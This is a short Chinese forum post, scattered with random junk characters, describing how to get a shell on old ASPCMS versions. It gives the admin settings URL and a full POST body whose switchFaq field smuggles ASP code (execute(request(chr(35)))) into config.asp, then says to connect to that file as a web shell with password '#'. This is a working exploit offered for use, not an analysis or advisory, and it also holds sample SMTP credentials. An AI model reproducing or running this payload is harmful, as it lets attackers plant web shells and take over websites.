老的ASPCMS版本的秒杀拿SHELL漏洞! W( S, L: u) G# {. o/ {
* D! `3 L' v ]2 U7 b: k7 J' h 找到后台。。。然后
% _3 h, X4 z. b- p3 V% R' k% C
# ]6 q* t- A& U* u: m$ B/admin/_system/AspCms_SiteSetting.asp?action=saves
s0 O% l: I3 q4 B7 a5 R 3 W1 l) K5 ~& l4 I
直接POST
- T9 O2 k; C Z2 \& a$ r# e
; v+ o; U. M. m0 j \4 ^5 _; C, P: @runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=10 G! d. ]; Y5 z$ \- o
; ?4 u7 V9 l q U! Y, j) @
再连接配置文件config.asp 密码为#
$ }: m e/ H) I& G. f/ b! r |